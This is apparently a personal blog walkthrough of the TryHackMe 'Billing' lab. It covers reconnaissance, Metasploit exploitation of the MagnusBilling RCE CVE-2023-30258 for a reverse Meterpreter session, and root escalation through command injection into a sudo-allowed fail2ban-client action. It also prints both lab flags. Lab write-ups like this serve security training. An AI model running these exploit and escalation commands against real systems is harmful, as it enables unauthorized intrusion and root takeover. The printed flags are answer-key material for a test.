Hi everyone, today we’ll be solving this room called BILLING from TryHackMe. This room was a fun to work on, got to learn a bit more and I honestly didn’t expected it to be this interesting I don’t know why.
Anyway, here we are and this blog I’ll guide you through all the tough passage and lend in a few tips/tricks here and there. ALRIGHT!!!!
Room: Billing
Difficulty: Medium
Objective: Gain initial access, escalate privileges, and retrieve user and root flags.
Note: Brute-forcing is not allowed.
Initial Recon – Nmap Scan
We start with a full version and script scan using :
nmap -A 10.10.2.74| Port | Service | Version | Details |
|---|---|---|---|
| 22 | SSH | OpenSSH 9.2p1 | Debian |
| 80 | HTTP | Apache 2.4.62 | /mbilling/ → MagnusBilling |
| 3306 | MySQL | MariaDB | Unauthorized |
Browsing to http://10.10.2.74/mbilling/ shows a MagnusBilling login page. We attempted default credentials (admin/admin, root/root, etc.), but none worked, and the page locks IP after 5 failed attempts.
Directory Enumeration with Gobuster
We ran gobuster to enumerate accessible directories and files:
gobuster dir -u http://10.10.2.74/mbilling/ -w /usr/share/wordlists/dirb/common.txtAnd the results….
403 Forbidden:
/.hta
/.htaccess
/.htpasswd
/development.log
/production.log
/spamlog.log
/akeeba.backend.log
Accessible:
/archive/
/assets/
/fpdf/
/lib/
/resources/
/tmp/
/index.php
/LICENSEThe .log files looked juicy but were inaccessible. We noted interesting folders like /tmp/ and /lib/.
Exploiting MagnusBilling (RCE)
After searching online, we found an unauthenticated RCE vulnerability in MagnusBilling : CVE-2023-30258
We launched Metasploit and loaded the exploit :
msf6 > use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
msf6 exploit(...) > set RHOSTS 10.10.2.74
msf6 exploit(...) > set LHOST <YOUR_IP>
msf6 exploit(...) > runAnd here are the results of the exploit…
[+] The target is vulnerable.
[*] Sending payload...
[*] Meterpreter session 1 opened!We’re in!
Post-Exploit Enumeration
Once inside, our present working directory was:
/var/www/html/mbilling/lib/icepayWe explored back up to /var/www/html/mbilling/ and found a file : MagnusBilling-current.tar.gz
However, after analyzing it, this turned out to be a rabbit hole.
User Flag – Accessing Home Directory
We navigated to /home:
meterpreter > cd /home
meterpreter > lsFound 3 users: debian, magnus, and ssm-user.
In /home/magnus/, we found :
user.txt → THM{4a6831d5f124b25eefb1e92e0f0da4ca}SSH Credentials?
We also spotted a .ssh folder, so we spawned a proper shell :
shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xtermUsing this access, we determined the session runs as asterisk.
Privilege Escalation (fail2ban abuse)
We checked sudo permissions : sudo -l
User asterisk may run the following command without password:
(ALL) NOPASSWD: /usr/bin/fail2ban-clientStep-by-step Exploit :
Restart fail2ban :
sudo /usr/bin/fail2ban-client restartInject command to copy root flag :
sudo /usr/bin/fail2ban-client set sshd action iptables-multiport actionban "/bin/bash -c 'cp /root/root.txt /tmp/root.txt && chmod 777 /tmp/root.txt'"Trigger the ban :
sudo /usr/bin/fail2ban-client set sshd banip 127.0.0.1Retrieve the flag :
cat /tmp/root.txt
THM{33ad5b530e71a172648f424ec23fae60}Like I said, I enjoyed this room thoroughly, although took me some time to finish but yeahhh I love doing this.
Feel free to follow along or reach out if you want to try some other room together like this room too!
If you’re as passionate about Cyber-Security as I am, feel free to follow me on Twitter – @shrisec for the latest updates and connect with me on LinkedIn – Aditya Narayan to stay in the loop with my posts and insights in the upcoming projects and CTF writeups.
Let’s continue this fascinating journey together!
